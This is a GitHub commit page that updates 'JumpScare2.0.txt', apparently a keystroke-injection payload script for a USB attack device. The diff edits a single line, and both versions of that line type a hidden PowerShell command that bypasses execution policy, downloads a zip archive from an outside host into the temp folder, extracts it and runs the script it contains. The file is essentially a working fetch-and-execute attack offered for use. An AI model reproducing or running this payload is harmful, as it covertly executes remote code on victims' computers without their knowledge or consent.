Update JumpScare2.0.txt

This commit is contained in:
Jonas 2022-12-27 23:48:56 +01:00 committed by GitHub
parent 78ed741731
commit 78516fd820
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -10,5 +10,5 @@ REM -------------------------------------------------------------------------
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass $downloadDirectory = "$env:tmp";iwr -Uri 'https://jakoby.lol/kiv' -OutFile "$downloadDirectory\js.zip";Expand-Archive "$downloadDirectory\js.zip" -DestinationPath $downloadDirectory -Force;. "$downloadDirectory\js\js.ps1"
STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1"
ENTER